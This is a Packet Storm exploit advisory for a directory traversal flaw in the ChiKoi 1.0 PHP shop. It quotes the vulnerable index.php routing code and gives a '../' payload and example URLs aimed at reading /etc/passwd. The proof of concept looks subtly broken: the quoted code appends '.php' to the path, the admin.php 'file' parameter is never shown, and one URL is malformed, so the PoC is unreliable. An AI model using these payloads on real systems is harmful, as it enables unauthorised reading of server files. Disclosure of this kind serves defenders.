ChiKoi 1.0 Directory Traversal ≈ Packet Storm

ChiKoi 1.0 Directory Traversal ≈ Packet Storm

Home[1] Files[2] News[3] &[SERVICES_TAB] Contact[4] Add New[5]

ChiKoi 1.0 Directory Traversal[6]
Authored by indoushka[7]

ChiKoi version 1.0 suffers from a directory traversal vulnerability.

SHA-256 | f6f4c9a329aacc62158437feb049e556fbc94806ccce29cccc65207d028728aa

Change Mirror[11] Download[12]

        ====================================================================================================================================
| # Title : ChiKoi version 1.0 Directory Traversal Vulnerability Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 65.0(32-bit) |
| # Vendor : https://codeload.github.com/tanhongit/new-mvc-shop/zip/refs/tags/v1.0 |
| # Dork : |
====================================================================================================================================
poc :
[+] Dorking İn Google Or Other Search Enggine .
[+] infested file : index.php & admin.php
<!--
Developed by: TanHongIT
Website: https://tanhongit.com - https://tanhongit.net
Github: https://github.com/TanHongIT
-->
<?php
session_start();
require_once('lib/model.php');
require_once('lib/functions.php');
require_once('content/models/cart.php');
require "lib/statistics.php";
require "lib/counter.php";
// $count_file = 'logs/counter.txt';
// $ip_file = 'logs/ip.txt';
// function counting_ip()
// {
// $ip = $_SERVER['REMOTE_ADDR'];
// global $count_file, $ip_file;
// if (!in_array($ip, file($ip_file, FILE_IGNORE_NEW_LINES))) {
// $current_val = (file_exists($count_file)) ? file_get_contents($count_file) : 0;
// file_put_contents($ip_file, $ip . "\n", FILE_APPEND);
// file_put_contents($count_file, ++$current_val);
// }
// }
// counting_ip();
if (isset($_GET['controller'])) $controller = $_GET['controller'];
else $controller = 'home';
if (isset($_GET['action'])) $action = $_GET['action'];
else $action = 'index';
$file = 'content/controllers/' . $controller . '/' . $action . '.php';
if (file_exists($file)) {
require($file);
} else {
show_404();
}
[+] use payload : ../../../../../../../../../etc/passwd
[+] https://127.0.0.1/chikoiquan.tanhongitcom/index.php?action=../../../../../../../../../etc/passwd
[+] https://127.0.0.1/https://chikoiquan.tanhongitcom/admin.php?file=../../../../../../../../../etc/passwd
== Greetings to :===========================================================================
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* |
============================================================================================

Login[13] or Register[14] to add favorites

File Archive:

February 2023

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa

File Tags

File Archives

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec[118]
close
Image

Pensée du jour :

Ce que l'homme a fait ,

l'homme peut le défaire.

 

"No secure path in the world"